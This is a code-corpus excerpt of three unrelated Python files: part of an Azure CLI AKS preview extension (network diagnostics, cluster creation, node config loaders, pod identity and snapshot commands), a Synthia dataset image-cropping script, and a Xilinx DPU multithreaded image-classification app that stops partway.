"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
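# Parse the aks_custom_headers argument into a dict, e.g. (illustrative values)
# "Key1=Value1,Key2=Value2" -> {"Key1": "Value1", "Key2": "Value2"}.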
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('Custom headers format is incorrect; expected comma-separated key=value pairs')
headers[parts[0]] = parts[1]
return headers
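# PUT the managed cluster and, when any enabled addon or the cluster identity needs a role
# assignment that can only be made after creation (monitoring, ingress-appgw, virtual-node,
# ACR attach, VNet permission for the cluster identity), wait for the operation to finish and
# perform those assignments; otherwise honor --no-wait.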
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require a post-cluster-creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# MDM metrics are supported only in the Azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'the ACR to it; you can manually grant permission to the identity '
'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_message_of_the_day(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
content = read_file_content(file_path)
if not content:
raise ArgumentUsageError(
"message of the day should point to a non-empty file if specified.")
content = base64.b64encode(bytes(content, 'ascii')).decode('ascii')
return content
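# Load a custom kubelet configuration JSON file (camelCase keys such as "cpuManagerPolicy",
# "imageGcHighThreshold", "podMaxPids") into a KubeletConfig object; see
# https://aka.ms/CustomNodeConfig for the documented format.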
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
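# Load a custom Linux OS configuration JSON file (transparent huge page settings, swap file size
# and a "sysctls" section) into a LinuxOSConfig/SysctlConfig pair; see
# https://aka.ms/CustomNodeConfig for the documented format.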
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
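# Load an HTTP proxy configuration JSON file into ManagedClusterHTTPProxyConfig.
# Illustrative file shape (values are placeholders): {"httpProxy": "http://proxy:3128",
# "httpsProxy": "https://proxy:3129", "noProxy": ["localhost"], "trustedCa": "<base64-encoded CA>"};
# see https://aka.ms/HttpProxyConfig for the documented format.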
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
cluster_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=cluster_id
)
snapshot = ManagedClusterSnapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData,
snapshot_type="ManagedCluster",
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the cluster snapshot "{}" in resource group "{}". Are you sure?'.format(
name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
def aks_nodepool_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
snapshot_name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=snapshot_name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, snapshot_name, snapshot, headers=headers)
def aks_nodepool_snapshot_show(cmd, client, resource_group_name, snapshot_name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, snapshot_name)
return snapshot
def aks_nodepool_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
snapshot_name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the nodepool snapshot "{}" in resource group "{}". Are you sure?'.format(
snapshot_name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, snapshot_name)
def aks_nodepool_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
prepare_data.py
|
import os
import os.path
import argparse
from multiprocessing import Process
import cv2
# create a directory if it does not already exist
def make_dir(path):
if not os.path.isdir(path):
os.mkdir(path)
# center-crop the depth image and keep only the red channel
def process_depth(input_depth_path, output_depth_path):
depth = cv2.imread(input_depth_path, cv2.IMREAD_UNCHANGED)
h_in, w_in, _ = depth.shape
depth_cropped = depth[(h_in//2) - (h_out//2) : (h_in//2) + (h_out//2), (w_in//2) - (w_out//2) : (w_in//2) + (w_out//2)]
depth_cropped_b, depth_cropped_g, depth_cropped_r = cv2.split(depth_cropped)
cv2.imwrite(output_depth_path, depth_cropped_r)
# center-crop the RGB image
def process_rgb(input_rgb_path, output_rgb_path):
rgb = cv2.imread(input_rgb_path, cv2.IMREAD_COLOR)
h_in, w_in, _ = rgb.shape
rgb_cropped = rgb[(h_in//2) - (h_out//2) : (h_in//2) + (h_out//2), (w_in//2) - (w_out//2) : (w_in//2) + (w_out//2)]
cv2.imwrite(output_rgb_path, rgb_cropped)
# center-crop the class-label (GT) image and keep only the red channel
def process_gt(input_gt_path, output_gt_path):
gt = cv2.imread(input_gt_path, cv2.IMREAD_UNCHANGED)
h_in, w_in, _ = gt.shape
gt_cropped = gt[(h_in//2) - (h_out//2) : (h_in//2) + (h_out//2), (w_in//2) - (w_out//2) : (w_in//2) + (w_out//2)]
gt_cropped_b, gt_cropped_g, gt_cropped_r = cv2.split(gt_cropped)
cv2.imwrite(output_gt_path, gt_cropped_r)
parser = argparse.ArgumentParser('processing data!')
parser.add_argument('--input_root', type=str, default="/media/amir/storage2/Data/synthia/unrarred", help='point it towards the synthia root.')
parser.add_argument('--output_root', type=str, default="/media/amir/storage2/Data/synthia/new", help='point it towards where you want to copy everything. A directory called "processed" will be made here.')
parser.add_argument('--height', type=int, default=256, help='height of the center crop')
parser.add_argument('--width', type=int, default=1024, help='width of the center crop')
args = parser.parse_args()
root_input_path = args.input_root
make_dir(args.output_root)
root_output_path = os.path.join(args.output_root, 'processed')
make_dir(root_output_path)
seq_output_path = os.path.join(root_output_path, '%d')
h_out = args.height
w_out = args.width
i = 1
main_seqS = os.listdir(root_input_path)
main_seqS.sort()
faceS = ['B', 'F', 'L', 'R']
left_rightS = ['Left', 'Right']
_depth_dir = os.path.join(root_input_path, '%s', 'Depth', 'Stereo_'+'%s', 'Omni_'+'%s')
_rgb_dir = os.path.join(root_input_path, '%s', 'RGB', 'Stereo_'+'%s', 'Omni_'+'%s')
_seg_dir = os.path.join(root_input_path, '%s', 'GT', 'LABELS' , 'Stereo_'+'%s', 'Omni_'+'%s')
print('starting...')
for seq in main_seqS:
for left_right in left_rightS:
for face in faceS:
input_depth_dir = _depth_dir % (seq, left_right, face)
input_rgb_dir = _rgb_dir % (seq, left_right, face)
input_seg_dir = _seg_dir % (seq, left_right, face)
if (os.path.isdir(input_seg_dir) and os.path.isdir(input_depth_dir) and os.path.isdir(input_rgb_dir)):
num_rgb_files = len([name for name in os.listdir(input_rgb_dir) if os.path.isfile(os.path.join(input_rgb_dir, name))])
num_depth_files = len([name for name in os.listdir(input_depth_dir) if os.path.isfile(os.path.join(input_depth_dir, name))])
num_seg_files = len([name for name in os.listdir(input_seg_dir) if os.path.isfile(os.path.join(input_seg_dir, name))])
if(num_rgb_files == num_depth_files and num_depth_files == num_seg_files):
make_dir(seq_output_path % i)
output_rgb_dir = os.path.join(seq_output_path % i, 'RGB')
output_depth_dir = os.path.join(seq_output_path % i, 'Depth')
output_seg_dir = os.path.join(seq_output_path % i, 'GT')
make_dir(output_rgb_dir)
make_dir(output_depth_dir)
make_dir(output_seg_dir)
print('processing %d images from %s and writing them in %s.' % (num_rgb_files, input_rgb_dir, output_rgb_dir))
for frm_num in range(num_rgb_files):
input_rgb_path = os.path.join(input_rgb_dir, '%06d.png' % (frm_num))
input_depth_path = os.path.join(input_depth_dir, '%06d.png' % (frm_num))
input_gt_path = os.path.join(input_seg_dir, '%06d.png' % (frm_num))
output_rgb_path = os.path.join(output_rgb_dir, '%06d.png' % (frm_num))
output_depth_path = os.path.join(output_depth_dir, '%06d.png' % (frm_num))
output_gt_path = os.path.join(output_seg_dir, '%06d.png' % (frm_num))
p_depth = Process(target=process_depth, args=(input_depth_path, output_depth_path,))
p_rgb = Process(target=process_rgb, args=(input_rgb_path, output_rgb_path,))
p_gt = Process(target=process_gt, args=(input_gt_path, output_gt_path,))
p_depth.start()
p_rgb.start()
p_gt.start()
p_depth.join()
p_rgb.join()
p_gt.join()
print(' ... Done!')
i+=1
print('All finished. %d sequences have been processed.' % (i - 1))
|
app_mt.py
|
'''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
Author: Mark Harvey, Xilinx Inc
'''
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import os
import pathlib
import xir
import threading
import time
import sys
import argparse
divider = '-----------------------------------------------'
def preprocess_fn(image_path):
'''
Image pre-processing.
Converts from BGR to RGB, then normalizes pixel values to the range 0 to 1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image/255.0
return image
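# Note (descriptive): cv2.imread returns a uint8 BGR array; after dividing by 255.0 the
# result is float64 in [0, 1]. runDPU later copies it into a float32 input buffer, so no
# explicit cast is needed here.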
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
'''
interrogate model file to return subgraphs
Returns a list of subgraph objects
'''
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (root_subgraph is not None), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def runDPU(id,start,dpu,img):
'''
DPU execution - called in thread from app function.
Arguments:
id: integer to identify thread - not currently used
start: Start index for writes to out_q.
dpu: runner
img: list of pre-processed images to pass into DPU
'''
''' input/output tensor information
get_input_tensors() and get_output_tensors() return lists of tensors objects.
The lists will contain one element for each input or output of the network.
The shape of each tensor object is (batch,height,width,channels)
For Zynq DPUCZDX8G DPU, batchsize is always 1 and this code can be simplified.
'''
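# Example (assumption, not taken from this model): for a 224x224 RGB classifier compiled
# for a batch-1 DPU, input_ndim would be (1, 224, 224, 3) and output_ndim (1, <num classes>).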
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
runSize=n_of_images-count
'''prepare batch input/output '''
outputData = []
inputData = []
inputData = [np.empty(input_ndim, dtype=np.float32, order="C")]
outputData = [np.empty(output_ndim, dtype=np.float32, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
'''store output vectors in global results list '''
for j in range(runSize):
out_q[write_index] = np.argmax(outputData[0][j])
write_index += 1
count = count + runSize
return
def app(image_dir,threads,model):
'''
main application function
'''
listimage=os.listdir(image_dir)
runTotal = len(listimage[:2500])
print('Found',len(listimage),'images - processing',runTotal,'of them')
''' global list that all threads can write results to '''
global out_q
out_q = [None] * runTotal
''' get a list of subgraphs from the compiled model file '''
g = xir.Graph.deserialize(model)
subgraphs = get_child_subgraph_dpu(g)
print('Found',len(subgraphs),'subgraphs in',model)
''' create dpu runners
Each thread receives a dpu runner.
Each dpu runner executes a subgraph
'''
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
''' preprocess images '''
print('Pre-processing',runTotal,'images...')
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
img.append(preprocess_fn(path))
''' create threads
Each thread receives a section of the preprocessed images list as input and
will write results into the corresponding section of the global out_q list.
'''
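# Worked example (hypothetical numbers): 2500 images across 4 threads gives the slices
# [0:625], [625:1250], [1250:1875] and [1875:2500]; the last thread also absorbs any
# remainder when len(img) is not evenly divisible by the thread count.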
threadAll = []
start=0
for i in range(threads):
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
'''run threads '''
print('Starting',threads,'threads...')
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
threads_time = time2 - time1
''' post-processing '''
classes = ['dog','cat']
correct = 0
wrong = 0
for i in range(len(out_q)):
prediction = classes[out_q[i]]
ground_truth, _ = listimage[i].split('.',1)
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
accuracy = correct/len(out_q)
print (divider)
print('Correct:%d, Wrong:%d, Accuracy:%.4f' %(correct,wrong,accuracy))
print (divider)
fps = float(runTotal / threads_time)
